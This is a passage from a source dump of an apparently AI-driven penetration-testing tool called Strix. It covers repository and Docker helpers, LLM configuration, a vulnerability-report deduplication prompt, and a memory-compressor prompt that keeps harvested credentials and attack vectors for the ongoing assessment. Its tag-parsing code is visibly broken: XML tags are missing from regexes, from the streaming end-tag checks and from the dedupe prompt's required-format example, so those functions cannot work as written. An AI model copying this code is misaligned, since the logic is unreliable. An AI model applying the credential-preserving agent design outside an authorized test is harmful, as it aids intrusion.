details = target_info[\"details\"]\n workspace_subdir = details.get(\"workspace_subdir\")\n\n if target_info[\"type\"] == \"local_code\" and \"target_path\" in details:\n local_sources.append(\n {\n \"source_path\": details[\"target_path\"],\n \"workspace_subdir\": workspace_subdir,\n }\n )\n\n elif target_info[\"type\"] == \"repository\" and \"cloned_repo_path\" in details:\n local_sources.append(\n {\n \"source_path\": details[\"cloned_repo_path\"],\n \"workspace_subdir\": workspace_subdir,\n }\n )\n\n return local_sources\n\n\ndef _is_localhost_host(host: str) -> bool:\n host_lower = host.lower().strip(\"[]\")\n\n if host_lower in (\"localhost\", \"0.0.0.0\", \"::1\"): # nosec B104\n return True\n\n try:\n ip = ipaddress.ip_address(host_lower)\n if isinstance(ip, ipaddress.IPv4Address):\n return ip.is_loopback # 127.0.0.0/8\n if isinstance(ip, ipaddress.IPv6Address):\n return ip.is_loopback # ::1\n except ValueError:\n pass\n\n return False\n\n\ndef rewrite_localhost_targets(targets_info: list[dict[str, Any]], host_gateway: str) -> None:\n from yarl import URL # type: ignore[import-not-found]\n\n for target_info in targets_info:\n target_type = target_info.get(\"type\")\n details = target_info.get(\"details\", {})\n\n if target_type == \"web_application\":\n target_url = details.get(\"target_url\", \"\")\n try:\n url = URL(target_url)\n except (ValueError, TypeError):\n continue\n\n if url.host and _is_localhost_host(url.host):\n details[\"target_url\"] = str(url.with_host(host_gateway))\n\n elif target_type == \"ip_address\":\n target_ip = details.get(\"target_ip\", \"\")\n if target_ip and _is_localhost_host(target_ip):\n details[\"target_ip\"] = host_gateway\n\n\n# Repository utilities\ndef clone_repository(repo_url: str, run_name: str, dest_name: str | None = None) -> str:\n console = Console()\n\n git_executable = shutil.which(\"git\")\n if git_executable is None:\n raise FileNotFoundError(\"Git executable not found in PATH\")\n\n temp_dir = Path(tempfile.gettempdir()) / \"strix_repos\" / run_name\n temp_dir.mkdir(parents=True, exist_ok=True)\n\n if dest_name:\n repo_name = dest_name\n else:\n repo_name = Path(repo_url).stem if repo_url.endswith(\".git\") else Path(repo_url).name\n\n clone_path = temp_dir / repo_name\n\n if clone_path.exists():\n shutil.rmtree(clone_path)\n\n try:\n with console.status(f\"[bold cyan]Cloning repository {repo_url}...\", spinner=\"dots\"):\n subprocess.run( # noqa: S603\n [\n git_executable,\n \"clone\",\n repo_url,\n str(clone_path),\n ],\n capture_output=True,\n text=True,\n check=True,\n )\n\n return str(clone_path.absolute())\n\n except subprocess.CalledProcessError as e:\n error_text = Text()\n error_text.append(\"REPOSITORY CLONE FAILED\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(f\"Could not clone repository: {repo_url}\\n\", style=\"white\")\n error_text.append(\n f\"Error: {e.stderr if hasattr(e, 'stderr') and e.stderr else str(e)}\", style=\"dim red\"\n )\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n console.print(\"\\n\")\n console.print(panel)\n console.print()\n sys.exit(1)\n except FileNotFoundError:\n error_text = Text()\n error_text.append(\"GIT NOT FOUND\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(\"Git is not installed or not available in PATH.\\n\", style=\"white\")\n error_text.append(\"Please install Git to clone repositories.\\n\", style=\"white\")\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n console.print(\"\\n\")\n console.print(panel)\n console.print()\n sys.exit(1)\n\n\n# Docker utilities\ndef check_docker_connection() -> Any:\n try:\n return docker.from_env()\n except DockerException:\n console = Console()\n error_text = Text()\n error_text.append(\"DOCKER NOT AVAILABLE\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(\"Cannot connect to Docker daemon.\\n\", style=\"white\")\n error_text.append(\n \"Please ensure Docker Desktop is installed and running, and try running strix again.\\n\",\n style=\"white\",\n )\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n console.print(\"\\n\", panel, \"\\n\")\n raise RuntimeError(\"Docker not available\") from None\n\n\ndef image_exists(client: Any, image_name: str) -> bool:\n try:\n client.images.get(image_name)\n except ImageNotFound:\n return False\n else:\n return True\n\n\ndef update_layer_status(layers_info: dict[str, str], layer_id: str, layer_status: str) -> None:\n if \"Pull complete\" in layer_status or \"Already exists\" in layer_status:\n layers_info[layer_id] = \"βœ“\"\n elif \"Downloading\" in layer_status:\n layers_info[layer_id] = \"↓\"\n elif \"Extracting\" in layer_status:\n layers_info[layer_id] = \"πŸ“¦\"\n elif \"Waiting\" in layer_status:\n layers_info[layer_id] = \"⏳\"\n else:\n layers_info[layer_id] = \"β€’\"\n\n\ndef process_pull_line(\n line: dict[str, Any], layers_info: dict[str, str], status: Any, last_update: str\n) -> str:\n if \"id\" in line and \"status\" in line:\n layer_id = line[\"id\"]\n update_layer_status(layers_info, layer_id, line[\"status\"])\n\n completed = sum(1 for v in layers_info.values() if v == \"βœ“\")\n total = len(layers_info)\n\n if total > 0:\n update_msg = f\"[bold cyan]Progress: {completed}/{total} layers complete\"\n if update_msg != last_update:\n status.update(update_msg)\n return update_msg\n\n elif \"status\" in line and \"id\" not in line:\n global_status = line[\"status\"]\n if \"Pulling from\" in global_status:\n status.update(\"[bold cyan]Fetching image manifest...\")\n elif \"Digest:\" in global_status:\n status.update(\"[bold cyan]Verifying image...\")\n elif \"Status:\" in global_status:\n status.update(\"[bold cyan]Finalizing...\")\n\n return last_update\n\n\n# LLM utilities\ndef validate_llm_response(response: Any) -> None:\n if not response or not response.choices or not response.choices[0].message.content:\n raise RuntimeError(\"Invalid response from LLM\")\n\n\ndef validate_config_file(config_path: str) -> Path:\n console = Console()\n path = Path(config_path)\n\n if not path.exists():\n console.print(f\"[bold red]Error:[/] Config file not found: {config_path}\")\n sys.exit(1)\n\n if path.suffix != \".json\":\n console.print(\"[bold red]Error:[/] Config file must be a .json file\")\n sys.exit(1)\n\n try:\n with path.open(\"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n except json.JSONDecodeError as e:\n console.print(f\"[bold red]Error:[/] Invalid JSON in config file: {e}\")\n sys.exit(1)\n\n if not isinstance(data, dict):\n console.print(\"[bold red]Error:[/] Config file must contain a JSON object\")\n sys.exit(1)\n\n if \"env\" not in data or not isinstance(data.get(\"env\"), dict):\n console.print(\"[bold red]Error:[/] Config file must have an 'env' object\")\n sys.exit(1)\n\n return path\n" }, { "path": "strix/llm/__init__.py", "content": "import logging\nimport warnings\n\nimport litellm\n\nfrom .config import LLMConfig\nfrom .llm import LLM, LLMRequestFailedError\n\n\n__all__ = [\n \"LLM\",\n \"LLMConfig\",\n \"LLMRequestFailedError\",\n]\n\nlitellm._logging._disable_debugging()\nlogging.getLogger(\"asyncio\").setLevel(logging.CRITICAL)\nlogging.getLogger(\"asyncio\").propagate = False\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning, module=\"asyncio\")\n" }, { "path": "strix/llm/config.py", "content": "from strix.config import Config\nfrom strix.config.config import resolve_llm_config\nfrom strix.llm.utils import resolve_strix_model\n\n\nclass LLMConfig:\n def __init__(\n self,\n model_name: str | None = None,\n enable_prompt_caching: bool = True,\n skills: list[str] | None = None,\n timeout: int | None = None,\n scan_mode: str = \"deep\",\n interactive: bool = False,\n ):\n resolved_model, self.api_key, self.api_base = resolve_llm_config()\n self.model_name = model_name or resolved_model\n\n if not self.model_name:\n raise ValueError(\"STRIX_LLM environment variable must be set and not empty\")\n\n api_model, canonical = resolve_strix_model(self.model_name)\n self.litellm_model: str = api_model or self.model_name\n self.canonical_model: str = canonical or self.model_name\n\n self.enable_prompt_caching = enable_prompt_caching\n self.skills = skills or []\n\n self.timeout = timeout or int(Config.get(\"llm_timeout\") or \"300\")\n\n self.scan_mode = scan_mode if scan_mode in [\"quick\", \"standard\", \"deep\"] else \"deep\"\n\n self.interactive = interactive\n" }, { "path": "strix/llm/dedupe.py", "content": "import json\nimport logging\nimport re\nfrom typing import Any\n\nimport litellm\n\nfrom strix.config.config import resolve_llm_config\nfrom strix.llm.utils import resolve_strix_model\n\n\nlogger = logging.getLogger(__name__)\n\nDEDUPE_SYSTEM_PROMPT = \"\"\"You are an expert vulnerability report deduplication judge.\nYour task is to determine if a candidate vulnerability report describes the SAME vulnerability\nas any existing report.\n\nCRITICAL DEDUPLICATION RULES:\n\n1. SAME VULNERABILITY means:\n - Same root cause (e.g., \"missing input validation\" not just \"SQL injection\")\n - Same affected component/endpoint/file (exact match or clear overlap)\n - Same exploitation method or attack vector\n - Would be fixed by the same code change/patch\n\n2. NOT DUPLICATES if:\n - Different endpoints even with same vulnerability type (e.g., SQLi in /login vs /search)\n - Different parameters in same endpoint (e.g., XSS in 'name' vs 'comment' field)\n - Different root causes (e.g., stored XSS vs reflected XSS in same field)\n - Different severity levels due to different impact\n - One is authenticated, other is unauthenticated\n\n3. ARE DUPLICATES even if:\n - Titles are worded differently\n - Descriptions have different level of detail\n - PoC uses different payloads but exploits same issue\n - One report is more thorough than another\n - Minor variations in technical analysis\n\nCOMPARISON GUIDELINES:\n- Focus on the technical root cause, not surface-level similarities\n- Same vulnerability type (SQLi, XSS) doesn't mean duplicate - location matters\n- Consider the fix: would fixing one also fix the other?\n- When uncertain, lean towards NOT duplicate\n\nFIELDS TO ANALYZE:\n- title, description: General vulnerability info\n- target, endpoint, method: Exact location of vulnerability\n- technical_analysis: Root cause details\n- poc_description: How it's exploited\n- impact: What damage it can cause\n\nYOU MUST RESPOND WITH EXACTLY THIS XML FORMAT AND NOTHING ELSE:\n\n\ntrue\nvuln-0001\n0.95\nBoth reports describe SQL injection in /api/login via the username parameter\n\n\nOR if not a duplicate:\n\n\nfalse\n\n0.90\nDifferent endpoints: candidate is /api/search, existing is /api/login\n\n\nRULES:\n- is_duplicate MUST be exactly \"true\" or \"false\" (lowercase)\n- duplicate_id MUST be the exact ID from existing reports or empty if not duplicate\n- confidence MUST be a decimal (your confidence level in the decision)\n- reason MUST be a specific explanation mentioning endpoint/parameter/root cause\n- DO NOT include any text outside the tags\"\"\"\n\n\ndef _prepare_report_for_comparison(report: dict[str, Any]) -> dict[str, Any]:\n relevant_fields = [\n \"id\",\n \"title\",\n \"description\",\n \"impact\",\n \"target\",\n \"technical_analysis\",\n \"poc_description\",\n \"endpoint\",\n \"method\",\n ]\n\n cleaned = {}\n for field in relevant_fields:\n if report.get(field):\n value = report[field]\n if isinstance(value, str) and len(value) > 8000:\n value = value[:8000] + \"...[truncated]\"\n cleaned[field] = value\n\n return cleaned\n\n\ndef _extract_xml_field(content: str, field: str) -> str:\n pattern = rf\"<{field}>(.*?)\"\n match = re.search(pattern, content, re.DOTALL | re.IGNORECASE)\n if match:\n return match.group(1).strip()\n return \"\"\n\n\ndef _parse_dedupe_response(content: str) -> dict[str, Any]:\n result_match = re.search(\n r\"(.*?)\", content, re.DOTALL | re.IGNORECASE\n )\n\n if not result_match:\n logger.warning(f\"No block found in response: {content[:500]}\")\n raise ValueError(\"No block found in response\")\n\n result_content = result_match.group(1)\n\n is_duplicate_str = _extract_xml_field(result_content, \"is_duplicate\")\n duplicate_id = _extract_xml_field(result_content, \"duplicate_id\")\n confidence_str = _extract_xml_field(result_content, \"confidence\")\n reason = _extract_xml_field(result_content, \"reason\")\n\n is_duplicate = is_duplicate_str.lower() == \"true\"\n\n try:\n confidence = float(confidence_str) if confidence_str else 0.0\n except ValueError:\n confidence = 0.0\n\n return {\n \"is_duplicate\": is_duplicate,\n \"duplicate_id\": duplicate_id[:64] if duplicate_id else \"\",\n \"confidence\": confidence,\n \"reason\": reason[:500] if reason else \"\",\n }\n\n\ndef check_duplicate(\n candidate: dict[str, Any], existing_reports: list[dict[str, Any]]\n) -> dict[str, Any]:\n if not existing_reports:\n return {\n \"is_duplicate\": False,\n \"duplicate_id\": \"\",\n \"confidence\": 1.0,\n \"reason\": \"No existing reports to compare against\",\n }\n\n try:\n candidate_cleaned = _prepare_report_for_comparison(candidate)\n existing_cleaned = [_prepare_report_for_comparison(r) for r in existing_reports]\n\n comparison_data = {\"candidate\": candidate_cleaned, \"existing_reports\": existing_cleaned}\n\n model_name, api_key, api_base = resolve_llm_config()\n litellm_model, _ = resolve_strix_model(model_name)\n litellm_model = litellm_model or model_name\n\n messages = [\n {\"role\": \"system\", \"content\": DEDUPE_SYSTEM_PROMPT},\n {\n \"role\": \"user\",\n \"content\": (\n f\"Compare this candidate vulnerability against existing reports:\\n\\n\"\n f\"{json.dumps(comparison_data, indent=2)}\\n\\n\"\n f\"Respond with ONLY the XML block.\"\n ),\n },\n ]\n\n completion_kwargs: dict[str, Any] = {\n \"model\": litellm_model,\n \"messages\": messages,\n \"timeout\": 120,\n }\n if api_key:\n completion_kwargs[\"api_key\"] = api_key\n if api_base:\n completion_kwargs[\"api_base\"] = api_base\n\n response = litellm.completion(**completion_kwargs)\n\n content = response.choices[0].message.content\n if not content:\n return {\n \"is_duplicate\": False,\n \"duplicate_id\": \"\",\n \"confidence\": 0.0,\n \"reason\": \"Empty response from LLM\",\n }\n\n result = _parse_dedupe_response(content)\n\n logger.info(\n f\"Deduplication check: is_duplicate={result['is_duplicate']}, \"\n f\"confidence={result['confidence']}, reason={result['reason'][:100]}\"\n )\n\n except Exception as e:\n logger.exception(\"Error during vulnerability deduplication check\")\n return {\n \"is_duplicate\": False,\n \"duplicate_id\": \"\",\n \"confidence\": 0.0,\n \"reason\": f\"Deduplication check failed: {e}\",\n \"error\": str(e),\n }\n else:\n return result\n" }, { "path": "strix/llm/llm.py", "content": "import asyncio\nfrom collections.abc import AsyncIterator\nfrom dataclasses import dataclass\nfrom typing import Any\n\nimport litellm\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom litellm import acompletion, completion_cost, stream_chunk_builder, supports_reasoning\nfrom litellm.utils import supports_prompt_caching, supports_vision\n\nfrom strix.config import Config\nfrom strix.llm.config import LLMConfig\nfrom strix.llm.memory_compressor import MemoryCompressor\nfrom strix.llm.utils import (\n _truncate_to_first_function,\n fix_incomplete_tool_call,\n normalize_tool_format,\n parse_tool_invocations,\n)\nfrom strix.skills import load_skills\nfrom strix.tools import get_tools_prompt\nfrom strix.utils.resource_paths import get_strix_resource_path\n\n\nlitellm.drop_params = True\nlitellm.modify_params = True\n\n\nclass LLMRequestFailedError(Exception):\n def __init__(self, message: str, details: str | None = None):\n super().__init__(message)\n self.message = message\n self.details = details\n\n\n@dataclass\nclass LLMResponse:\n content: str\n tool_invocations: list[dict[str, Any]] | None = None\n thinking_blocks: list[dict[str, Any]] | None = None\n\n\n@dataclass\nclass RequestStats:\n input_tokens: int = 0\n output_tokens: int = 0\n cached_tokens: int = 0\n cost: float = 0.0\n requests: int = 0\n\n def to_dict(self) -> dict[str, int | float]:\n return {\n \"input_tokens\": self.input_tokens,\n \"output_tokens\": self.output_tokens,\n \"cached_tokens\": self.cached_tokens,\n \"cost\": round(self.cost, 4),\n \"requests\": self.requests,\n }\n\n\nclass LLM:\n def __init__(self, config: LLMConfig, agent_name: str | None = None):\n self.config = config\n self.agent_name = agent_name\n self.agent_id: str | None = None\n self._active_skills: list[str] = list(config.skills or [])\n self._total_stats = RequestStats()\n self.memory_compressor = MemoryCompressor(model_name=config.litellm_model)\n self.system_prompt = self._load_system_prompt(agent_name)\n\n reasoning = Config.get(\"strix_reasoning_effort\")\n if reasoning:\n self._reasoning_effort = reasoning\n elif config.scan_mode == \"quick\":\n self._reasoning_effort = \"medium\"\n else:\n self._reasoning_effort = \"high\"\n\n def _load_system_prompt(self, agent_name: str | None) -> str:\n if not agent_name:\n return \"\"\n\n try:\n prompt_dir = get_strix_resource_path(\"agents\", agent_name)\n skills_dir = get_strix_resource_path(\"skills\")\n env = Environment(\n loader=FileSystemLoader([prompt_dir, skills_dir]),\n autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),\n )\n\n skills_to_load = self._get_skills_to_load()\n skill_content = load_skills(skills_to_load)\n env.globals[\"get_skill\"] = lambda name: skill_content.get(name, \"\")\n\n result = env.get_template(\"system_prompt.jinja\").render(\n get_tools_prompt=get_tools_prompt,\n loaded_skill_names=list(skill_content.keys()),\n interactive=self.config.interactive,\n **skill_content,\n )\n return str(result)\n except Exception: # noqa: BLE001\n return \"\"\n\n def _get_skills_to_load(self) -> list[str]:\n ordered_skills = [*self._active_skills]\n ordered_skills.append(f\"scan_modes/{self.config.scan_mode}\")\n\n deduped: list[str] = []\n seen: set[str] = set()\n for skill_name in ordered_skills:\n if skill_name not in seen:\n deduped.append(skill_name)\n seen.add(skill_name)\n\n return deduped\n\n def add_skills(self, skill_names: list[str]) -> list[str]:\n added: list[str] = []\n for skill_name in skill_names:\n if not skill_name or skill_name in self._active_skills:\n continue\n self._active_skills.append(skill_name)\n added.append(skill_name)\n\n if not added:\n return []\n\n updated_prompt = self._load_system_prompt(self.agent_name)\n if updated_prompt:\n self.system_prompt = updated_prompt\n\n return added\n\n def set_agent_identity(self, agent_name: str | None, agent_id: str | None) -> None:\n if agent_name:\n self.agent_name = agent_name\n if agent_id:\n self.agent_id = agent_id\n\n async def generate(\n self, conversation_history: list[dict[str, Any]]\n ) -> AsyncIterator[LLMResponse]:\n messages = self._prepare_messages(conversation_history)\n max_retries = int(Config.get(\"strix_llm_max_retries\") or \"5\")\n\n for attempt in range(max_retries + 1):\n try:\n async for response in self._stream(messages):\n yield response\n return # noqa: TRY300\n except Exception as e: # noqa: BLE001\n if attempt >= max_retries or not self._should_retry(e):\n self._raise_error(e)\n wait = min(10, 2 * (2**attempt))\n await asyncio.sleep(wait)\n\n async def _stream(self, messages: list[dict[str, Any]]) -> AsyncIterator[LLMResponse]:\n accumulated = \"\"\n chunks: list[Any] = []\n done_streaming = 0\n\n self._total_stats.requests += 1\n response = await acompletion(**self._build_completion_args(messages), stream=True)\n\n async for chunk in response:\n chunks.append(chunk)\n if done_streaming:\n done_streaming += 1\n if getattr(chunk, \"usage\", None) or done_streaming > 5:\n break\n continue\n delta = self._get_chunk_content(chunk)\n if delta:\n accumulated += delta\n if \"\" in accumulated or \"\" in accumulated:\n end_tag = \"\" if \"\" in accumulated else \"\"\n pos = accumulated.find(end_tag)\n accumulated = accumulated[: pos + len(end_tag)]\n yield LLMResponse(content=accumulated)\n done_streaming = 1\n continue\n yield LLMResponse(content=accumulated)\n\n if chunks:\n self._update_usage_stats(stream_chunk_builder(chunks))\n\n accumulated = normalize_tool_format(accumulated)\n accumulated = fix_incomplete_tool_call(_truncate_to_first_function(accumulated))\n yield LLMResponse(\n content=accumulated,\n tool_invocations=parse_tool_invocations(accumulated),\n thinking_blocks=self._extract_thinking(chunks),\n )\n\n def _prepare_messages(self, conversation_history: list[dict[str, Any]]) -> list[dict[str, Any]]:\n messages = [{\"role\": \"system\", \"content\": self.system_prompt}]\n\n if self.agent_name:\n messages.append(\n {\n \"role\": \"user\",\n \"content\": (\n f\"\\n\\n\\n\"\n f\"Internal metadata: do not echo or reference.\\n\"\n f\"{self.agent_name}\\n\"\n f\"{self.agent_id}\\n\"\n f\"\\n\\n\"\n ),\n }\n )\n\n compressed = list(self.memory_compressor.compress_history(conversation_history))\n conversation_history.clear()\n conversation_history.extend(compressed)\n messages.extend(compressed)\n\n if messages[-1].get(\"role\") == \"assistant\" and not self.config.interactive:\n messages.append({\"role\": \"user\", \"content\": \"Continue the task.\"})\n\n if self._is_anthropic() and self.config.enable_prompt_caching:\n messages = self._add_cache_control(messages)\n\n return messages\n\n def _build_completion_args(self, messages: list[dict[str, Any]]) -> dict[str, Any]:\n if not self._supports_vision():\n messages = self._strip_images(messages)\n\n args: dict[str, Any] = {\n \"model\": self.config.litellm_model,\n \"messages\": messages,\n \"timeout\": self.config.timeout,\n \"stream_options\": {\"include_usage\": True},\n }\n\n if self.config.api_key:\n args[\"api_key\"] = self.config.api_key\n if self.config.api_base:\n args[\"api_base\"] = self.config.api_base\n if self._supports_reasoning():\n args[\"reasoning_effort\"] = self._reasoning_effort\n\n return args\n\n def _get_chunk_content(self, chunk: Any) -> str:\n if chunk.choices and hasattr(chunk.choices[0], \"delta\"):\n return getattr(chunk.choices[0].delta, \"content\", \"\") or \"\"\n return \"\"\n\n def _extract_thinking(self, chunks: list[Any]) -> list[dict[str, Any]] | None:\n if not chunks or not self._supports_reasoning():\n return None\n try:\n resp = stream_chunk_builder(chunks)\n if resp.choices and hasattr(resp.choices[0].message, \"thinking_blocks\"):\n blocks: list[dict[str, Any]] = resp.choices[0].message.thinking_blocks\n return blocks\n except Exception: # noqa: BLE001, S110 # nosec B110\n pass\n return None\n\n def _update_usage_stats(self, response: Any) -> None:\n try:\n if hasattr(response, \"usage\") and response.usage:\n input_tokens = getattr(response.usage, \"prompt_tokens\", 0) or 0\n output_tokens = getattr(response.usage, \"completion_tokens\", 0) or 0\n\n cached_tokens = 0\n if hasattr(response.usage, \"prompt_tokens_details\"):\n prompt_details = response.usage.prompt_tokens_details\n if hasattr(prompt_details, \"cached_tokens\"):\n cached_tokens = prompt_details.cached_tokens or 0\n\n cost = self._extract_cost(response)\n else:\n input_tokens = 0\n output_tokens = 0\n cached_tokens = 0\n cost = 0.0\n\n self._total_stats.input_tokens += input_tokens\n self._total_stats.output_tokens += output_tokens\n self._total_stats.cached_tokens += cached_tokens\n self._total_stats.cost += cost\n\n except Exception: # noqa: BLE001, S110 # nosec B110\n pass\n\n def _extract_cost(self, response: Any) -> float:\n if hasattr(response, \"usage\") and response.usage:\n direct_cost = getattr(response.usage, \"cost\", None)\n if direct_cost is not None:\n return float(direct_cost)\n try:\n if hasattr(response, \"_hidden_params\"):\n response._hidden_params.pop(\"custom_llm_provider\", None)\n return completion_cost(response, model=self.config.canonical_model) or 0.0\n except Exception: # noqa: BLE001\n return 0.0\n\n def _should_retry(self, e: Exception) -> bool:\n code = getattr(e, \"status_code\", None) or getattr(\n getattr(e, \"response\", None), \"status_code\", None\n )\n return code is None or litellm._should_retry(code)\n\n def _raise_error(self, e: Exception) -> None:\n from strix.telemetry import posthog\n\n posthog.error(\"llm_error\", type(e).__name__)\n raise LLMRequestFailedError(f\"LLM request failed: {type(e).__name__}\", str(e)) from e\n\n def _is_anthropic(self) -> bool:\n if not self.config.model_name:\n return False\n return any(p in self.config.model_name.lower() for p in [\"anthropic/\", \"claude\"])\n\n def _supports_vision(self) -> bool:\n try:\n return bool(supports_vision(model=self.config.canonical_model))\n except Exception: # noqa: BLE001\n return False\n\n def _supports_reasoning(self) -> bool:\n try:\n return bool(supports_reasoning(model=self.config.canonical_model))\n except Exception: # noqa: BLE001\n return False\n\n def _strip_images(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:\n result = []\n for msg in messages:\n content = msg.get(\"content\")\n if isinstance(content, list):\n text_parts = []\n for item in content:\n if isinstance(item, dict) and item.get(\"type\") == \"text\":\n text_parts.append(item.get(\"text\", \"\"))\n elif isinstance(item, dict) and item.get(\"type\") == \"image_url\":\n text_parts.append(\"[Image removed - model doesn't support vision]\")\n result.append({**msg, \"content\": \"\\n\".join(text_parts)})\n else:\n result.append(msg)\n return result\n\n def _add_cache_control(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:\n if not messages or not supports_prompt_caching(self.config.canonical_model):\n return messages\n\n result = list(messages)\n\n if result[0].get(\"role\") == \"system\":\n content = result[0][\"content\"]\n result[0] = {\n **result[0],\n \"content\": [\n {\"type\": \"text\", \"text\": content, \"cache_control\": {\"type\": \"ephemeral\"}}\n ]\n if isinstance(content, str)\n else content,\n }\n return result\n" }, { "path": "strix/llm/memory_compressor.py", "content": "import logging\nfrom typing import Any\n\nimport litellm\n\nfrom strix.config.config import Config, resolve_llm_config\n\n\nlogger = logging.getLogger(__name__)\n\n\nMAX_TOTAL_TOKENS = 100_000\nMIN_RECENT_MESSAGES = 15\n\nSUMMARY_PROMPT_TEMPLATE = \"\"\"You are an agent performing context\ncondensation for a security agent. Your job is to compress scan data while preserving\nALL operationally critical information for continuing the security assessment.\n\nCRITICAL ELEMENTS TO PRESERVE:\n- Discovered vulnerabilities and potential attack vectors\n- Scan results and tool outputs (compressed but maintaining key findings)\n- Access credentials, tokens, or authentication details found\n- System architecture insights and potential weak points\n- Progress made in the assessment\n- Failed attempts and dead ends (to avoid duplication)\n- Any decisions made about the testing approach\n\nCOMPRESSION GUIDELINES:\n- Preserve exact technical details (URLs, paths, parameters, payloads)\n- Summarize verbose tool outputs while keeping critical findings\n- Maintain version numbers, specific technologies identified\n- Keep exact error messages that might indicate vulnerabilities\n- Compress repetitive or similar findings into consolidated form\n\nRemember: Another security agent will use this summary to continue the assessment.\nThey must be able to pick up exactly where you left off without losing any\noperational advantage or context needed to find vulnerabilities.\n\nCONVERSATION SEGMENT TO SUMMARIZE:\n{conversation}\n\nProvide a technically precise summary that preserves all operational security context while\nkeeping the summary concise and to the point.\"\"\"\n\n\ndef _count_tokens(text: str, model: str) -> int:\n try:\n count = litellm.token_counter(model=model, text=text)\n return int(count)\n except Exception:\n logger.exception(\"Failed to count tokens\")\n return len(text) // 4 # Rough estimate\n\n\ndef _get_message_tokens(msg: dict[str, Any], model: str) -> int:\n content = msg.get(\"content\", \"\")\n if isinstance(content, str):\n return _count_tokens(content, model)\n if isinstance(content, list):\n return sum(\n _count_tokens(item.get(\"text\", \"\"), model)\n for item in content\n if isinstance(item, dict) and item.get(\"type\") == \"text\"\n )\n return 0\n\n\ndef _extract_message_text(msg: dict[str, Any]) -> str:\n content = msg.get(\"content\", \"\")\n if isinstance(content, str):\n return content\n\n if isinstance(content, list):\n parts = []\n for item in content:\n if isinstance(item, dict):\n if item.get(\"type\") == \"text\":\n parts.append(item.get(\"text\", \"\"))\n elif item.get(\"type\") == \"image_url\":\n parts.append(\"[IMAGE]\")\n return \" \".join(parts)\n\n return str(content)\n\n\ndef _summarize_messages(\n messages: list[dict[str, Any]],\n model: str,\n timeout: int = 30,\n) -> dict[str, Any]:\n if not messages:\n empty_summary = \"{text}\"\n return {\n \"role\": \"user\",\n \"content\": empty_summary.format(text=\"No messages to summarize\"),\n }\n\n formatted = []\n for msg in messages:\n role = msg.get(\"role\", \"unknown\")\n text = _extract_message_text(msg)\n formatted.append(f\"{role}: {text}\")\n\n conversation = \"\\n\".join(formatted)\n prompt = SUMMARY_PROMPT_TEMPLATE.format(conversation=conversation)\n\n _, api_key, api_base = resolve_llm_config()\n\n try:\n completion_args: dict[str, Any] = {\n \"model\": model,\n \"messages\": [{\"role\": \"user\", \"content\": prompt}],\n \"timeout\": timeout,\n }\n if api_key:\n completion_args[\"api_key\"] = api_key\n if api_base:\n completion_args[\"api_base\"] = api_base\n\n response = litellm.completion(**completion_args)\n summary = response.choices[0].message.content or \"\"\n if not summary.strip():\n return messages[0]\n summary_msg = \"{text}\"\n return {\n \"role\": \"user\",\n \"content\": summary_msg.format(count=len(messages), text=summary),\n }\n except Exception:\n logger.exception(\"Failed to summarize messages\")\n return messages[0]\n\n\ndef _handle_images(messages: list[dict[str, Any]], max_images: int) -> None:\n image_count = 0\n for msg in reversed(messages):\n content = msg.get(\"content\", [])\n if isinstance(content, list):\n for item in content:\n if isinstance(item, dict) and item.get(\"type\") == \"image_url\":\n if image_count >= max_images:\n item.update(\n {\n \"type\": \"text\",\n \"text\": \"[Previously attached image removed to preserve context]\",\n }\n )\n else:\n image_count += 1\n\n\nclass MemoryCompressor:\n def __init__(\n self,\n max_images: int = 3,\n model_name: str | None = None,\n timeout: int | None = None,\n ):\n self.max_images = max_images\n self.model_name = model_name or Config.get(\"strix_llm\")\n self.timeout = timeout or int(Config.get(\"strix_memory_compressor_timeout\") or \"120\")\n\n if not self.model_name:\n raise ValueError(\"STRIX_LLM environment variable must be set and not empty\")\n\n def compress_history(\n self,\n messages: list[dict[str, Any]],\n ) -> list[dict[str, Any]]:\n \"\"\"Compress conversation history to stay within token limits.\n\n Strategy:\n 1. Handle image limits first\n 2. Keep all system messages\n 3. Keep minimum recent messages\n 4. Summarize older messages when total tokens exceed limit\n\n The compression preserves:\n - All system messages unchanged\n - Most recent messages intact\n - Critical security context in summaries\n - Recent images for visual context\n - Technical details and findings\n \"\"\"\n if not messages:\n return messages\n\n _handle_images(messages, self.max_images)\n\n system_msgs = []\n regular_msgs = []\n for msg in messages:\n if msg.get(\"role\") == \"system\":\n system_msgs.append(msg)\n else:\n regular_msgs.append(msg)\n\n recent_msgs = regular_msgs[-MIN_RECENT_MESSAGES:]\n old_msgs = regular_msgs[:-MIN_RECENT_MESSAGES]\n\n # Type assertion since we ensure model_name is not None in __init__\n model_name: str = self.model_name # type: ignore[assignment]\n\n total_tokens = sum(\n _get_message_tokens(msg, model_name) for msg in system_msgs + regular_msgs\n )\n\n if total_tokens <= MAX_TOTAL_TOKENS * 0.9:\n return messages\n\n compressed = []\n chunk_size = 10\n for i in range(0, len(old_msgs), chunk_size):\n chunk = old_msgs[i : i + chunk_size]\n summary = _summarize_messages(chunk, model_name, self.timeout)\n if summary:\n compressed.append(summary)\n\n return system_msgs + compressed + recent_msgs\n" }, { "path": "strix/llm/utils.py", "content": "import html\nimport re\nfrom typing import Any\n\n\n_INVOKE_OPEN = re.compile(r'')\n_PARAM_NAME_ATTR = re.compile(r'')\n_FUNCTION_CALLS_TAG = re.compile(r\"\")\n_STRIP_TAG_QUOTES = re.compile(r\"<(function|parameter)\\s*=\\s*([^>]*?)>\")\n\n\ndef normalize_tool_format(content: str) -> str:\n \"\"\"Convert alternative tool-call XML formats to the expected one.\n\n Handles:\n ... β†’ stripped\n β†’ \n β†’ \n β†’ \n β†’ \n β†’ \n \"\"\"\n if \"\", content)\n content = 